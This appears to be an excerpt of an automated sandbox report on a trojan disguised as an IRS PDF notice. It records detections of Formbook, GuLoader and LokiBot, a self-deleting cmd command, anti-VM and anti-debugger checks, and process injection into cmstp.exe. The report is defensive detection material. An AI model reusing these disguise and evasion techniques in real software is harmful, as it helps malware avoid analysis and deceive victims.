      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C2D90
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030DC5A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C8C4B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C8C50
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: String function: 1E23B150 appears 136 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04F5B150 appears 72 times
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693272578.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameklogelig.exe vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693439941.00000000021A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.755498311.000000001E32F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000000.692053161.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameklogelig.exe vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.754867271.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exeBinary or memory string: OriginalFilenameklogelig.exe vs IRS Notice Letter pdf document.exe
      Source: IRS Notice Letter pdf document.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.1021594863.000000000322D000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@17/7
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile created: C:\Users\user\AppData\Local\Temp\~DF845B25EDF66F8583.TMPJump to behavior
      Source: IRS Notice Letter pdf document.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: Binary string: cmstp.pdbGCTL source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: IRS Notice Letter pdf document.exe, 00000001.00000002.755014575.000000001E210000.00000040.00000001.sdmp, cmstp.exe, 00000003.00000002.1021841767.0000000004F30000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: IRS Notice Letter pdf document.exe, cmstp.exe
      Source: Binary string: cmstp.pdb source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match, File source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 6092, type: MEMORY
      Source: Yara match, File source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 3788, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match, File source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 6092, type: MEMORY
      Source: Yara match, File source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 3788, type: MEMORY
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_00415F3E push eax; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_00405F80 push edx; iretd
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D5131 push BB6660BAh; iretd
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D885A push CA8566BAh; retn 001Ch
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2895 push 81D884BAh; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_1E28D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_0056885A push CA8566BAh; retn 001Ch
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00565845 push edx; retf
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00565131 push BB6660BAh; iretd
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_04FAD0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_030DB3A5 push eax; ret
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_030DB3FB push eax; ret
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_030DB3F2 push eax; ret
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_030D8F34 push esp; iretd
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_030DCC2C push edi; ret
      Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 3_2_030DB45C push eax; ret
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmstp.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2317 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2335
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D237D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D236C
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2389
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D43B9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D23D9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D23CD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D23C1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D241D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2429
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2455
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2452
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D246D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2461
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D24B9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D24AD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D24AA
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D24C5
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005643B9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005634D1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005634C5
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005634FD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563492
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005634B4
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563559
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_0056354D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_0056354A
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563565
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563515
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563509
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005635C9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005635F9
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005635ED
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005635BD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_005635AC
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_0056365E
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563648
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 1_2_00563605
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000021D0E11 second address: 00000000021D0E11 instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000021D3B9A second address: 00000000021D3B9A instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000005624EA second address: 00000000005624EA instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 0000000000562620 second address: 0000000000562620 instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693450693.00000000021D0000.00000040.00000001.sdmp, IRS Notice Letter pdf document.exe, 00000001.00000002.751120614.0000000000562000.00000040.00000001.sdmp, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE=
      Source: IRS Notice Letter pdf document.exe, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000021D0E11 second address: 00000000021D0E11 instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000021D3B9A second address: 00000000021D3B9A instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000005624EA second address: 00000000005624EA instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 0000000000562620 second address: 0000000000562620 instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exe, RDTSC instruction interceptor: First address: 00000000030C85E4 second address: 00000000030C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exe, RDTSC instruction interceptor: First address: 00000000030C896E second address: 00000000030C8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D34AF rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Window / User API: threadDelayed 9369
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Window / User API: threadDelayed 631
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, API coverage: 3.5 %
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, API coverage: 3.7 %
      Source: C:\Windows\SysWOW64\cmstp.exe, API coverage: 8.5 %
      Source: C:\Windows\explorer.exe TID: 4500, Thread sleep time: -75000s >= -30000s
      Source: C:\Windows\SysWOW64\cmstp.exe TID: 1900, Thread sleep time: -54000s >= -30000s
      Source: C:\Windows\explorer.exe, Last function: Thread delayed
      Source: C:\Windows\SysWOW64\cmstp.exe, Last function: Thread delayed
      Source: C:\Windows\SysWOW64\cmstp.exe, Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000002.00000000.734772024.000000000A60E000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693450693.00000000021D0000.00000040.00000001.sdmp, IRS Notice Letter pdf document.exe, 00000001.00000002.751120614.0000000000562000.00000040.00000001.sdmp, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe=
      Source: explorer.exe, 00000002.00000000.731028319.0000000006650000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.734772024.000000000A60E000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.751435169.0000000000917000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.729316309.0000000004710000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 00000002.00000000.734930880.000000000A716000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: IRS Notice Letter pdf document.exe, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000002.00000000.735028043.000000000A784000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D4BFA NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000040,021D09A4,00000000
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D34AF rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D5252 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8211 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8205 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D825E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8250 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8271 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8296 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2317 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8119 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D817D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8161 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D8198 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D81A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D81DD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D81F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D81E9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D66D1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D741C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2A43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2A99 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2A88 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2AAA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D3F04 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2D29 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 0_2_021D2D5D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E23E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2EFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E23C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E268E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2F1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E26A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E24766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2B46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2CFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2616E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2476E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E278EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E308ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2636CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E26E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E25B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe Code function: 1_2_1E26A70E mov eax, dword ptr fs:[00000030h]
